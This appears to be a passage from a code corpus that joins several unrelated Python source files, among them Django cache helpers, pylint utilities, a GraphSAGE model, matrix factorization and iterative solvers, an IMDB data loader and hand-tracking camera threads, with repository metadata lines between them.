key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
if cache_timeout is None:
cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
cache_key = _generate_cache_header_key(key_prefix, request)
if cache is None:
cache = caches[settings.CACHE_MIDDLEWARE_ALIAS]
if response.has_header('Vary'):
is_accept_language_redundant = settings.USE_I18N or settings.USE_L10N
# If i18n or l10n are used, the generated cache key will be suffixed
# with the current locale. Adding the raw value of Accept-Language is
# redundant in that case and would result in storing the same content
# under multiple keys in the cache. See #18191 for details.
headerlist = []
for header in cc_delim_re.split(response['Vary']):
header = header.upper().replace('-', '_')
if header != 'ACCEPT_LANGUAGE' or not is_accept_language_redundant:
headerlist.append('HTTP_' + header)
headerlist.sort()
cache.set(cache_key, headerlist, cache_timeout)
return _generate_cache_key(request, request.method, headerlist, key_prefix)
else:
# if there is no Vary header, we still need a cache key
# for the request.build_absolute_uri()
cache.set(cache_key, [], cache_timeout)
return _generate_cache_key(request, request.method, [], key_prefix)
def _to_tuple(s):
t = s.split('=', 1)
if len(t) == 2:
return t[0].lower(), t[1]
return t[0].lower(), True
```
#### File: django/utils/topological_sort.py
```python
class CyclicDependencyError(ValueError):
pass
def topological_sort_as_sets(dependency_graph):
"""
Variation of Kahn's algorithm (1962) that returns sets.
Take a dependency graph as a dictionary of node => dependencies.
Yield sets of items in topological order, where the first set contains
all nodes without dependencies, and each following set contains all
nodes that may depend on the nodes only in the previously yielded sets.
"""
todo = dependency_graph.copy()
while todo:
current = {node for node, deps in todo.items() if not deps}
if not current:
raise CyclicDependencyError('Cyclic dependency in graph: {}'.format(
', '.join(repr(x) for x in todo.items())))
yield current
# remove current from todo's nodes & dependencies
todo = {node: (dependencies - current) for node, dependencies in
todo.items() if node not in current}
def stable_topological_sort(nodes, dependency_graph):
result = []
for layer in topological_sort_as_sets(dependency_graph):
for node in nodes:
if node in layer:
result.append(node)
return result
```
#### File: pylint/lint/utils.py
```python
import contextlib
import sys
from pylint.utils import utils
class ArgumentPreprocessingError(Exception):
"""Raised if an error occurs during argument preprocessing."""
def preprocess_options(args, search_for):
"""look for some options (keys of <search_for>) which have to be processed
before others
values of <search_for> are callback functions to call when the option is
found
"""
i = 0
while i < len(args):
arg = args[i]
if arg.startswith("--"):
try:
option, val = arg[2:].split("=", 1)
except ValueError:
option, val = arg[2:], None
try:
cb, takearg = search_for[option]
except KeyError:
i += 1
else:
del args[i]
if takearg and val is None:
if i >= len(args) or args[i].startswith("-"):
msg = "Option %s expects a value" % option
raise ArgumentPreprocessingError(msg)
val = args[i]
del args[i]
elif not takearg and val is not None:
msg = "Option %s doesn't expects a value" % option
raise ArgumentPreprocessingError(msg)
cb(option, val)
else:
i += 1
def _patch_sys_path(args):
original = list(sys.path)
changes = []
seen = set()
for arg in args:
path = utils.get_python_path(arg)
if path not in seen:
changes.append(path)
seen.add(path)
sys.path[:] = changes + sys.path
return original
@contextlib.contextmanager
def fix_import_path(args):
"""Prepare sys.path for running the linter checks.
Within this context, each of the given arguments is importable.
Paths are added to sys.path in corresponding order to the arguments.
We avoid adding duplicate directories to sys.path.
`sys.path` is reset to its original value upon exiting this context.
"""
original = _patch_sys_path(args)
try:
yield
finally:
sys.path[:] = original
```
#### File: pylint/utils/file_state.py
```python
import collections
from astroid import nodes
from pylint.constants import MSG_STATE_SCOPE_MODULE, WarningScope
class FileState:
"""Hold internal state specific to the currently analyzed file"""
def __init__(self, modname=None):
self.base_name = modname
self._module_msgs_state = {}
self._raw_module_msgs_state = {}
self._ignored_msgs = collections.defaultdict(set)
self._suppression_mapping = {}
self._effective_max_line_number = None
def collect_block_lines(self, msgs_store, module_node):
"""Walk the AST to collect block level options line numbers."""
for msg, lines in self._module_msgs_state.items():
self._raw_module_msgs_state[msg] = lines.copy()
orig_state = self._module_msgs_state.copy()
self._module_msgs_state = {}
self._suppression_mapping = {}
self._effective_max_line_number = module_node.tolineno
self._collect_block_lines(msgs_store, module_node, orig_state)
def _collect_block_lines(self, msgs_store, node, msg_state):
"""Recursively walk (depth first) AST to collect block level options
line numbers.
"""
for child in node.get_children():
self._collect_block_lines(msgs_store, child, msg_state)
first = node.fromlineno
last = node.tolineno
# first child line number used to distinguish between disable
# which are the first child of scoped node with those defined later.
# For instance in the code below:
#
# 1. def meth8(self):
# 2. """test late disabling"""
# 3. pylint: disable=not-callable
# 4. print(self.blip)
# 5. pylint: disable=no-member
# 6. print(self.bla)
#
# E1102 should be disabled from line 1 to 6 while E1101 from line 5 to 6
#
# this is necessary to disable locally messages applying to class /
# function using their fromlineno
if (
isinstance(node, (nodes.Module, nodes.ClassDef, nodes.FunctionDef))
and node.body
):
firstchildlineno = node.body[0].fromlineno
else:
firstchildlineno = last
for msgid, lines in msg_state.items():
for lineno, state in list(lines.items()):
original_lineno = lineno
if first > lineno or last < lineno:
continue
# Set state for all lines for this block, if the
# warning is applied to nodes.
message_definitions = msgs_store.get_message_definitions(msgid)
for message_definition in message_definitions:
if message_definition.scope == WarningScope.NODE:
if lineno > firstchildlineno:
state = True
first_, last_ = node.block_range(lineno)
else:
first_ = lineno
last_ = last
for line in range(first_, last_ + 1):
# do not override existing entries
if line in self._module_msgs_state.get(msgid, ()):
continue
if line in lines: # state change in the same block
state = lines[line]
original_lineno = line
if not state:
self._suppression_mapping[(msgid, line)] = original_lineno
try:
self._module_msgs_state[msgid][line] = state
except KeyError:
self._module_msgs_state[msgid] = {line: state}
del lines[lineno]
def set_msg_status(self, msg, line, status):
"""Set status (enabled/disable) for a given message at a given line"""
assert line > 0
try:
self._module_msgs_state[msg.msgid][line] = status
except KeyError:
self._module_msgs_state[msg.msgid] = {line: status}
def handle_ignored_message(
self, state_scope, msgid, line, node, args, confidence
): # pylint: disable=unused-argument
"""Report an ignored message.
state_scope is either MSG_STATE_SCOPE_MODULE or MSG_STATE_SCOPE_CONFIG,
depending on whether the message was disabled locally in the module,
or globally. The other arguments are the same as for add_message.
"""
if state_scope == MSG_STATE_SCOPE_MODULE:
try:
orig_line = self._suppression_mapping[(msgid, line)]
self._ignored_msgs[(msgid, orig_line)].add(line)
except KeyError:
pass
def iter_spurious_suppression_messages(self, msgs_store):
for warning, lines in self._raw_module_msgs_state.items():
for line, enable in lines.items():
if not enable and (warning, line) not in self._ignored_msgs:
# ignore cyclic-import check which can show false positives
# here due to incomplete context
if warning != "R0401":
yield "useless-suppression", line, (
msgs_store.get_msg_display_string(warning),
)
# don't use iteritems here, _ignored_msgs may be modified by add_message
for (warning, from_), lines in list(self._ignored_msgs.items()):
for line in lines:
yield "suppressed-message", line, (
msgs_store.get_msg_display_string(warning),
from_,
)
def get_effective_max_line_number(self):
return self._effective_max_line_number
```
#### File: personal-website/personal_website/views.py
```python
from django.shortcuts import render, redirect
from .forms import ConatactMeForm
from django.contrib import messages
# from django.core.mail import send_mail
def about_me(request):
return render(request, "about.html", {})
def resume(request):
return render(request, "resume.html", {})
def contact_me(request):
if request.method == 'POST':
form = ConatactMeForm(request.POST)
if form.is_valid():
cd = form.cleaned_data
# send_mail('jestinmwilson-Form', cd['message'],
# '<EMAIL>', ['<EMAIL>', ])
messages.success(request, 'Your message has been successfully sent')
return redirect('contact-me')
else:
form = ConatactMeForm()
context = {
'form': form,
}
return render(request, "contact-me.html", context)
```
|
{
"source": "jestjest/cs224w-project",
"score": 3
}
|
#### File: old/original-graphsage/models.py
```python
import torch
import torch.nn as nn
from torch.nn import init
from encoders import *
from aggregators import *
class SupervisedGraphSage(nn.Module):
def __init__(self, num_classes, enc, w):
"""
w - array of len(num_classes) indicating the weight of each class when computing
loss.
"""
super(SupervisedGraphSage, self).__init__()
self.enc = enc
self.w = w
self.xent = nn.CrossEntropyLoss(weight=self.w)
self.weight = nn.Parameter(torch.FloatTensor(num_classes, enc.embed_dim))
init.xavier_uniform_(self.weight)
def forward(self, nodes):
embeds = self.enc(nodes)
scores = self.weight.mm(embeds)
return scores.t()
def loss(self, nodes, labels):
scores = self.forward(nodes)
return self.xent(scores, labels.squeeze())
def createGNN(args, features, adj_list, num_features, class_weights):
if args.model_type == 'GraphSage':
agg1 = MeanAggregator(features, cuda=False)
enc1 = Encoder(features, num_features, args.hidden_dim, adj_list, agg1, gcn=False, cuda=False)
enc1.num_samples = 25 # Sample 25 neighbors when aggregating.
return SupervisedGraphSage(len(class_weights), enc1, torch.FloatTensor(class_weights))
```
|
{
"source": "Jeston-de-Anda/SCBI_all",
"score": 2
}
|
#### File: SCBI_all/RoC_Comparisons/various_column.py
```python
import multiprocessing as mp
import numpy as np
import pickle
import datetime
import head_to_head
import sys
def write_stdout():
sys.stdout = open(str(datetime.datetime.today()) + ".log", "w")
def write_stderr():
sys.stderr = open(str(datetime.datetime.today()) + ".err", "w")
# cofigurations
RANK = 10
SAMPLE_SIZE = 1000000000
SINGLE_SAMPLE_SIZE = 2000
NUMBER_OF_COLUMNS = 2
FOR_LOOP_DEPTH = 500
# functions
def refresh_config():
global RANK, SAMPLE_SIZE, SINGLE_SAMPLE_SIZE, NUMBER_OF_COLUMNS
RANK = 10
SAMPLE_SIZE = 1000000000
SINGLE_SAMPLE_SIZE = 2000
NUMBER_OF_COLUMNS = 2
def sample_mat_default(row_size=RANK, col_size=RANK, size=SINGLE_SAMPLE_SIZE):
'''
default sampling function.
return an array of matrices of shape row_size*col_size,
'''
return np.random.dirichlet([1, ]*row_size,
col_size * size).reshape(-1, col_size, row_size).transpose(0, 2, 1)
def roc_bi(matrices):
'''
Calculate KL-divergence given an array of matrix. This is
naturally the RoC of BI.
Parameters
----------
matrices: an array of matrices, can be only one matrix. Must be column-normalized!
Return
------
l*m numpy array of RoC_BI, denoting the number of matrices with each hypothesis chosen
as the correct one.
'''
mat = matrices.reshape(-1, matrices.shape[-2], matrices.shape[-1])
l, n, m = mat.shape
log = np.log(mat) # will be used twice, calculate independently.
# next we calculate for each matrix and hypothesis, the KL-divergence,
# res in terms of (l,m,m) array, l matrices, m true hypotheses, m ref hypotheses
res = np.sum(mat.reshape(l, n, 1, m) * (log.reshape(l, n, 1, m) - log.reshape(l, n, m, 1)),
axis=1)
# next find the minimal nonzero elements among the 'other hypotheses'
return np.min(res + np.diag(np.ones(m)*np.inf).reshape(1, m, m), axis=1)
def roc_scbi(matrices):
'''
Calculate the rate of convergence of SCBI.
Parameters
----------
same as roc_bi()
Return
------
same format as roc_bi()
'''
mat = matrices.reshape(-1, matrices.shape[-2], matrices.shape[-1])
l, n, m = mat.shape
logm = np.log(mat)
# print(logm)
# 4 indices: (mat, row-index, other-col-index, true-col-index), same as in BI.
quotient = np.sum(mat.reshape(l, n, m, 1)/mat.reshape(l, n, 1, m), axis=1)
logq = np.log(quotient) + np.diag(np.ones(m)*np.inf).reshape(1, m, m)
# print(logq)
logs = np.mean(logm, axis=1)
other = logs.reshape(l, 1, m) - logs.reshape(l, m, 1) + logq
# print(other)
return np.min(other, axis=1) - np.log(n)
def comparison(matrices):
'''
Comparison of BI and SCBI
Parameters
----------
matrices: same as roc_bi()
Return
------
np.array([avg, prob])
avg : average of roc_bi - roc_scbi
prob: frequency of roc_bi <= roc_scbi
'''
diff = np.mean(roc_scbi(matrices), axis=1) - np.mean(roc_bi(matrices), axis=1)
return np.array([np.mean(diff), np.mean((diff >= 0))])
def single_round(args):
'''
Single round in multiprocessing
'''
global SINGLE_SAMPLE_SIZE, FOR_LOOP_DEPTH
seed, n, m = args
np.random.seed(seed)
result = np.zeros([FOR_LOOP_DEPTH, 2])
for i in range(FOR_LOOP_DEPTH):
matrices = np.random.dirichlet([1,]*n,
m * SINGLE_SAMPLE_SIZE).reshape(-1, m, n).transpose(0, 2, 1)
result[i,:] = comparison(matrices)
return np.mean(result, axis=0)
def multi_round(n, m):
'''
Multi-Processing
'''
global SAMPLE_SIZE
number_of_process = int(SAMPLE_SIZE / SINGLE_SAMPLE_SIZE / FOR_LOOP_DEPTH)
seeds = np.random.randint(int(2**32), size=number_of_process)
args = [(x, n, m) for x in seeds]
pool = mp.Pool()
print("\n", n, "rows", m, "colums")
result = np.array(pool.map(single_round, args))
pool.close()
return np.mean(result, axis=0)
def run10(start, size, sample=None, single = None):
'''
fix row number, vary column number
'''
global SAMPLE_SIZE, SINGLE_SAMPLE_SIZE
if sample is not None:
SAMPLE_SIZE = sample
SINGLE_SAMPLE_SIZE = single
r = []
print(datetime.datetime.today())
for i in range(start, size + 1):
r += [multi_round(size, i), ]
print("\n", r[-1])
print(datetime.datetime.today())
with open("fix_comparison_"+str(size)+"_by_"+str(i)+".log", "wb") as fp:
pickle.dump(r[-1], fp)
refresh_config()
return r
def run_full(start, size, sample=None, single=None):
'''
square matrix test
'''
global SAMPLE_SIZE, SINGLE_SAMPLE_SIZE
if sample is not None:
SAMPLE_SIZE = sample
SINGLE_SAMPLE_SIZE = single
r = []
print(datetime.datetime.today())
for i in range(start, size + 1):
r += [multi_round(i, i)]
print(r[-1])
print(datetime.datetime.today())
with open("square_"+str(i)+".log", "wb") as fp:
pickle.dump(r[-1], fp)
refresh_config()
return r
if __name__ == "__main__":
pass
```
|
{
"source": "jestra52/supor-numerical-analysis-api",
"score": 3
}
|
#### File: src/system_of_equations/factorization.py
```python
import copy as cp
import math as mt
import numpy as np
import threading
class Factorization:
def cholesky(self, A, b):
result = {
'aMatrix': None,
'bMatrix': None,
'lMatrix': None,
'uMatrix': None,
'xMatrix': None,
'iterations': None,
'hasInfiniteSolutions': False,
'resultMessage': None,
'solutionFailed': False,
'error': False,
'errorMessage': None
}
n = len(A)
L = np.zeros((n, n))
U = np.zeros((n, n))
phases = list()
def diagonal_operation_async(k):
incr = 0
for p in range(0, k):
incr += L[k][p] * U[p][k]
L[k][k] = mt.sqrt(A[k][k] - incr)
U[k][k] = L[k][k]
def row_operation_async(k, i):
incr = 0
for r in range(0, k):
incr += L[i][r] * U[r][k]
L[i][k] = (A[i][k] - incr) / L[k][k]
def column_operation_async(k, j):
incr = 0
for s in range(0, k):
incr += L[k][s] * U[s][j]
U[k][j] = (A[k][j] - incr) / L[k][k]
for k in range(0, n):
thread = threading.Thread(target=diagonal_operation_async, args=([k]))
thread.start()
thread.join()
if L[k][k] == 0:
raise ZeroDivisionError
threads = list()
for i in range(k+1, n):
thread = threading.Thread(target=row_operation_async, args=(k, i))
threads.append(thread)
thread.start()
for thread in threads: thread.join()
threads.clear()
for j in range(k+1, n):
thread = threading.Thread(target=column_operation_async, args=(k, j))
threads.append(thread)
thread.start()
for thread in threads: thread.join()
if k < n - 1:
iteration = {
'lMatrix': list(map(lambda l: list(l), cp.deepcopy(L))),
'uMatrix': list(map(lambda u: list(u), cp.deepcopy(U))),
}
phases.append(cp.deepcopy(iteration))
if not result['error']:
result['aMatrix'] = A
result['bMatrix'] = b
result['lMatrix'] = L
result['uMatrix'] = U
result['xMatrix'] = self.solve_x(L, U, b)
result['iterations'] = phases
return result
def doolittle(self, A, b):
result = {
'aMatrix': None,
'bMatrix': None,
'lMatrix': None,
'uMatrix': None,
'xMatrix': None,
'iterations': None,
'hasInfiniteSolutions': False,
'resultMessage': None,
'solutionFailed': False,
'error': False,
'errorMessage': None
}
n = len(A)
L = np.zeros((n, n))
U = np.zeros((n, n))
phases = list()
def column_operation_async(k, j):
incr = 0
for p in range(k):
incr += L[k][p] * U[p][j]
U[k][j] = (A[k][j] - incr)
def row_operation_async(k, i):
incr = 0
for r in range(k):
incr += L[i][r] * U[r][k]
L[i][k] = (A[i][k] - incr) / U[k][k]
for k in range(0,n):
threads = list()
for j in range(k, n):
thread = threading.Thread(target=column_operation_async, args=(k, j))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if U[k][k] == 0:
raise ZeroDivisionError
threads.clear()
for i in range(k, n):
thread = threading.Thread(target=row_operation_async, args=(k, i))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if k < n - 1:
iteration = {
'lMatrix': list(map(lambda l: list(l), cp.deepcopy(L))),
'uMatrix': list(map(lambda u: list(u), cp.deepcopy(U))),
}
phases.append(cp.deepcopy(iteration))
if not result['error']:
result['aMatrix'] = A
result['bMatrix'] = b
result['lMatrix'] = L
result['uMatrix'] = U
result['xMatrix'] = self.solve_x(L, U, b)
result['iterations'] = phases
return result
def crout(self, A, b):
result = {
'aMatrix': None,
'bMatrix': None,
'lMatrix': None,
'uMatrix': None,
'xMatrix': None,
'iterations': None,
'hasInfiniteSolutions': False,
'resultMessage': None,
'solutionFailed': False,
'error': False,
'errorMessage': None
}
n = len(A)
L = np.zeros((n, n))
U = np.zeros((n, n))
phases = list()
def row_operation_async(k, i):
incr = 0
for p in range(0,k):
incr += L[i][p] * U[p][k]
L[i][k] = A[i][k] - incr
def column_operation_async(k, j):
incr = 0
for p in range(0,k):
incr += L[k][p] * U[p][j]
U[k][j] = (A[k][j] - incr) / L[k][k]
for k in range(0, n):
threads = list()
for i in range(k, n):
thread = threading.Thread(target=row_operation_async, args=(k, i))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if L[k][k] == 0:
raise ZeroDivisionError
threads.clear()
for j in range(k, n):
thread = threading.Thread(target=column_operation_async, args=(k, j))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if k < n - 1:
iteration = {
'lMatrix': list(map(lambda l: list(l), cp.deepcopy(L))),
'uMatrix': list(map(lambda u: list(u), cp.deepcopy(U))),
}
phases.append(cp.deepcopy(iteration))
if not result['error']:
result['aMatrix'] = A
result['bMatrix'] = b
result['lMatrix'] = L
result['uMatrix'] = U
result['xMatrix'] = self.solve_x(L, U, b)
result['iterations'] = phases
return result
def solve_z(self, L, b):
n = len(b)
Z = []
for i in range(n):
Z.append(0)
for i in range(0, n):
incr = 0
for p in range(0, i):
incr += L[i][p] * Z[p]
if L[i][i] == 0:
raise ZeroDivisionError
Z[i] = (b[i] - incr) / L[i][i]
return Z
def solve_x(self, L, U, b):
n = len(b)
Z = self.solve_z(L, b)
X = []
for i in range(n):
X.append(0)
i = n - 1
while i >= 0:
incr = 0
for p in range(i+1, n):
incr += U[i][p] * X[p]
if U[i][i] == 0:
raise ZeroDivisionError
X[i] = (Z[i] - incr) / U[i][i]
i -= 1
return X
def get_invertible_matrix(self, L, U):
n = len(L)
invertible_a = []
for i in range(0, n):
b = []
for j in range(0, n):
if j == i: b.append(1)
else: b.append(0)
invertible_a.append(self.solve_x(L, U, b))
return invertible_a
```
#### File: src/system_of_equations/iterative_methods.py
```python
from shared import util
import copy
import math as mt
import numpy as np
import threading
class IterativeMethods():
def gauss_seidel(self, A, b, iterations, tol, l, xi, is_rel_error):
x = copy.deepcopy(xi)
result = {
'error': False,
'errorMessage': None,
'n': 0,
'resultMessage': None,
'solutionFailed': False,
'values': self.build_values(x)
}
if tol < 0:
result['error'] = True
result['errorMessage']= 'Tolerance must be greater or equals than 0'
elif iterations <= 0:
result['error'] = True
result['errorMessage']= 'Iterations must be greater than 0'
else:
m = len(x)
xold = []
for i in range(m):
xold.append(x[i])
x[i] = self.solve_new_x(i,x,l,A,b)
result['values'][f'x{i}'] = np.append(result.get('values').get(f'x{i}'), [x[i]])
error = np.float(util.getMatrixError(is_rel_error, xold, x))
result['values']['error'] = None
n=1
while error > tol and n < iterations:
xold = []
for i in range(m):
xold.append(x[i])
x[i] = self.solve_new_x(i,x,l,A,b)
result['values'][f'x{i}'] = np.append(result.get('values').get(f'x{i}'), [x[i]])
error = np.float(util.getMatrixError(is_rel_error, xold, x))
result['values']['error'] = np.append(result.get('values').get('error'), [error])
n+=1
if error < tol:
result['resultMessage'] = f'The solution was successful with a tolerance={tol} and {n} iterations'
else:
result['resultMessage'] = f'Solution failed for n={n} iterations'
result['solutionFailed'] = True
result['n'] = len(result.get('values').get('x0'))
return result
def jacobi(self, A, b, iterations, tol, l, x, is_rel_error):
result = {
'error': False,
'errorMessage': None,
'n': 0,
'resultMessage': None,
'solutionFailed': False,
'values': self.build_values(x)
}
if tol < 0:
result['error'] = True
result['errorMessage']= 'Tolerance must be greater or equals than 0'
elif iterations <= 0:
result['error'] = True
result['errorMessage']= 'Iterations must be greater than 0'
else:
m = len(x)
n = 0
error = tol + 1
while error>tol and n < iterations:
xnew = np.zeros(m,dtype=np.float64)
#PARALLELISM
threads = list()
for var_index in range(m):
thread = threading.Thread( target=self.solve_new_x_async, args=(A, b, var_index, x, xnew, l, m))
threads.append(thread)
thread.start()
i = 0
for thread in threads:
thread.join()
result['values'][f'x{i}'] = np.append(result.get('values').get(f'x{i}'), [xnew[i]])
i+=1
error = np.float(util.getMatrixError(is_rel_error,x,xnew))
result['values']['error'] = np.append(result.get('values').get('error'), [error])
x = xnew
n+=1
if error < tol:
result['resultMessage'] = f'The solution was successful with a tolerance={tol} and {n} iterations'
else:
result['resultMessage'] = f'Solution failed for n={n} iterations'
result['solutionFailed'] = True
result['n'] = len(result.get('values').get('x0'))
return result
def solve_new_x_async(self, A, b, i, xi, xn, lamb, n):
j = 0
den = 1
sum = b[i]
while den != 0 and j < n:
if(j != i):
sum -= A[i][j] * xi[j]
else:
den = A[i][j]
j += 1
if den != 0:
xn[i] = (lamb*(sum/den) + (1-lamb)*xi[i])
else:
raise ZeroDivisionError
def solve_new_x(self, i, arrX, l, A, b):
n = len(A)
den = 1
incr = b[i]
j = 0
while j < n and den != 0:
if i == j:
den = A[i][j]
else:
incr += (-1) * A[i][j] * arrX[j]
j+=1
if den == 0:
raise ZeroDivisionError
else:
xn = incr / den
xn = l * xn + (1 - l) * arrX[i]
return xn
def build_values(self, x):
values = {}
for i in range(len(x)):
values[f'x{i}'] = np.array([x[i]])
values["error"] = None
return values
def best_lambda_j(self, A, b, x, is_rel_error):
result = {
'error': False,
'errorMessage': None,
'resultMessage': None,
'lambda': None
}
itv = [0,1]
prop = 0.5
resultc = self.jacobi(A, b, 100, 0.000001, prop, x, is_rel_error)
if resultc['n'] <= 2:
result['error'] = True
result['errorMessage']= 'to calculate lambda the iterations must be greater than 2'
else:
while itv[0] != itv[1]:
results = self.jacobi(A, b, 100, 0.000001, prop+0.01, x, is_rel_error)
resulti = self.jacobi(A, b, 100, 0.000001, prop-0.01, x, is_rel_error)
ns = results['n']
ni = resulti['n']
es = results['values']['error'][-1]
ei = resulti['values']['error'][-1]
if ns < ni:
itv = [prop+0.01,itv[1]]
prop = round((itv[0]+itv[1])/2,2)
elif ni < ns:
itv = [itv[0],prop-0.01]
prop = round((itv[0]+itv[1])/2,2)
elif es < ei:
result['resultMessage'] = f'We recommend to use lambda = {prop} in jacobi'
result['lambda'] = prop
return result
else:
result['resultMessage'] = f'We recommend to use lambda = {prop} in jacobi'
result['lambda'] = prop
return result
result['resultMessage'] = f'We recommend to use lambda = {prop} in jacobi'
result['lambda'] = prop
return result
def best_lambda_g(self, A, b, x, is_rel_error):
result = {
'error': False,
'errorMessage': None,
'resultMessage': None,
'lambda': None
}
itv = [0,1]
prop = 0.5
resultc = self.gauss_seidel(A, b, 100, 0.000001, prop, x, is_rel_error)
if resultc['n'] <= 2:
result['error'] = True
result['errorMessage']= 'to calculate lambda the iterations must be greater than 2'
else:
while itv[0] != itv[1]:
results = self.gauss_seidel(A, b, 100, 0.000001, prop+0.01, x, is_rel_error)
resulti = self.gauss_seidel(A, b, 100, 0.000001, prop-0.01, x, is_rel_error)
ns = results['n']
ni = resulti['n']
es = results['values']['error'][-1]
ei = resulti['values']['error'][-1]
if ns < ni:
itv = [prop+0.01,itv[1]]
prop = round((itv[0]+itv[1])/2,2)
elif ni < ns:
itv = [itv[0],prop-0.01]
prop = round((itv[0]+itv[1])/2,2)
elif es < ei:
result['resultMessage'] = f'We recommend to use lambda = {prop} in gauss seidel'
result['lambda'] = prop
return result
else:
result['resultMessage'] = f'We recommend to use lambda = {prop} in gauss seidel'
result['lambda'] = prop
return result
result['resultMessage'] = f'We recommend to use lambda = {prop} in gauss seidel'
result['lambda'] = prop
return result
```
|
{
"source": "jestra52/twitter-sentiment-analysis",
"score": 3
}
|
#### File: twitter-sentiment-analysis/ml_source/format_dataset.py
```python
import numpy as np
import os
import pandas as pd
import re
HTML_TAGS = re.compile(r'<.*?>')
SPECIAL_CHARS_NO_SPACE = re.compile(r'[.;:!\'?,\"()\[\]]')
SPECIAL_CHARS_WITH_SPACE = re.compile(r'(<br\s*/><br\s*/>)|(\-)|(\/)')
class FormatDataset:
def load_train_test_imdb_data(self, data_dir):
data = {}
for split in ['train', 'test']:
data[split] = []
for sentiment in ['neg', 'pos']:
score = 1 if sentiment == 'pos' else 0
path = os.path.join(data_dir, split, sentiment)
file_names = os.listdir(path)
for f_name in file_names:
with open(os.path.join(path, f_name), 'r') as f:
review = f.read()
data[split].append([review, score])
np.random.shuffle(data['train'])
data['train'] = pd.DataFrame(data['train'], columns=['text', 'sentiment'])
np.random.shuffle(data["test"])
data['test'] = pd.DataFrame(data['test'], columns=['text', 'sentiment'])
return data['train'], data['test']
def clear_text(self, text):
text = HTML_TAGS.sub('', text.lower())
text = SPECIAL_CHARS_NO_SPACE.sub('', text)
text = SPECIAL_CHARS_WITH_SPACE.sub('', text)
return text
```
|
{
"source": "jesture-ai/jesture-sdk",
"score": 2
}
|
#### File: python/src/thread_camera_draw.py
```python
from threading import Thread
import logging
import cv2
from PIL import Image, ImageDraw, ImageFont
import matplotlib.pyplot as plt
from skimage import io
import numpy as np
from .utils import draw_skeleton
logging.basicConfig(level=logging.DEBUG, format='(%(threadName)-10s) %(message)s')
class ThreadCameraDraw:
def __init__(self, jesture_runner, cam_id=0, width=640, height=480,
hand_box_tl=None, hand_box_br=None, draw_hand_box=False, mirror=False):
'''
Args:
hand_box_tl (tuple[2]): top-left corner of ui box with hands
hand_box_br (tuple[2]): bottom-right corner of ui box with hands
'''
self.jesture_runner = jesture_runner
self.cam_id = cam_id
self.width = width
self.height = height
self.stream = cv2.VideoCapture(self.cam_id)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, self.width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
self.hand_box_tl = hand_box_tl
self.hand_box_br = hand_box_br
self.draw_hand_box = draw_hand_box
self.mirror = mirror
def _scale_and_shift(self, keypoints, scale, shift):
keypoints = np.array([scale[0], scale[1], 1]) * keypoints + np.array([shift[0], shift[1], 0])
return keypoints
def start(self):
logging.debug('[ThreadCameraDraw] Starting a thread...')
self.thread = Thread(name='Camera-Draw Python Thread', target=self.update, args=())
self.thread.start()
logging.debug('[ThreadCameraDraw] Thread started.')
return self
def update(self):
logged = False
while not self.stopped:
(self.grabbed, frame) = self.stream.read()
if not self.grabbed:
continue
display_height, display_width = frame.shape[:2]
if not logged:
print('Camera params was set to:', self.width, self.height)
print('Real params are:', display_width, display_height)
frame = cv2.resize(frame, (self.width, self.height))
# get current hand keypoints
left_keypoints = self.jesture_runner.get_hand_keypoints('left_keypoints')
right_keypoints = self.jesture_runner.get_hand_keypoints('right_keypoints')
left_keypoints = np.clip(left_keypoints, 0.0, 1.0) # !!!
right_keypoints = np.clip(right_keypoints, 0.0, 1.0) # !!!
# scale absolute keypoints by the actual display image size
left_keypoints = left_keypoints * np.array([display_width, display_height, 1.0])
if not logged: print(left_keypoints)
right_keypoints = right_keypoints * np.array([display_width, display_height, 1.0])
if not logged: print(right_keypoints)
if self.mirror:
left_keypoints[:,0] = display_width - left_keypoints[:,0]
right_keypoints[:,0] = display_width - right_keypoints[:,0]
# draw skeletons using screen-sized hand keypoints
frame = draw_skeleton(frame, left_keypoints)
frame = draw_skeleton(frame, right_keypoints)
# TODO: move all `ImageDraw` tasks to a separate thread or do it asynchronously
# draw a special box for scaled keypoints
if self.draw_hand_box:
frame = Image.fromarray(frame if type(np.array([])) == type(frame) else frame.get())
draw = ImageDraw.Draw(frame, "RGBA")
draw.rectangle((self.hand_box_tl, self.hand_box_br), fill=(0, 0, 0, 127), outline=(235, 190, 63, 255))
frame = np.array(frame).astype(np.uint8)
# get the scaled hand keypoints
scaled_left_keypoints = self.jesture_runner.get_hand_keypoints('scaled_left_keypoints')
scaled_right_keypoints = self.jesture_runner.get_hand_keypoints('scaled_right_keypoints')
scaled_left_keypoints = np.clip(scaled_left_keypoints, 0.0, 1.0) # !!!
scaled_right_keypoints = np.clip(scaled_right_keypoints, 0.0, 1.0) # !!!
# scale and shift them to be in a proper place on the display image
scale_x = (self.hand_box_br[0] - self.hand_box_tl[0]) // 2
scale_y = self.hand_box_br[1] - self.hand_box_tl[1]
scale = (scale_x, scale_y)
shift_left = (self.hand_box_tl[0], self.hand_box_tl[1])
shift_right = (self.hand_box_tl[0] + scale_x, self.hand_box_tl[1])
scaled_left_keypoints = self._scale_and_shift(
scaled_left_keypoints, scale=scale, shift=shift_left if self.mirror else shift_right)
scaled_right_keypoints = self._scale_and_shift(
scaled_right_keypoints, scale=scale, shift=shift_right if self.mirror else shift_left)
# draw scaled keypoints
frame = draw_skeleton(frame, scaled_left_keypoints, indices=False)
frame = draw_skeleton(frame, scaled_right_keypoints, indices=False)
# save to the field
self.frame = frame
if not logged:
logged = True
logging.debug('[ThreadCameraDraw] Frame loop finished.')
self.stream.release()
logging.debug('[ThreadCameraDraw] Capture released.')
def read(self):
return self.frame
def stop(self) :
logging.debug('[ThreadCameraDraw] Stopping...')
self.stopped = True
self.thread.join()
logging.debug('[ThreadCameraDraw] Camera thread joined.')
def __exit__(self, exc_type, exc_value, traceback):
self.stream.release()
```
#### File: python/src/thread_camera.py
```python
from threading import Thread
import logging
import cv2
logging.basicConfig(level=logging.DEBUG, format='(%(threadName)-10s) %(message)s')
class ThreadCamera:
def __init__(self, cam_id=0, width=640, height=480):
self.stream = cv2.VideoCapture(cam_id)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
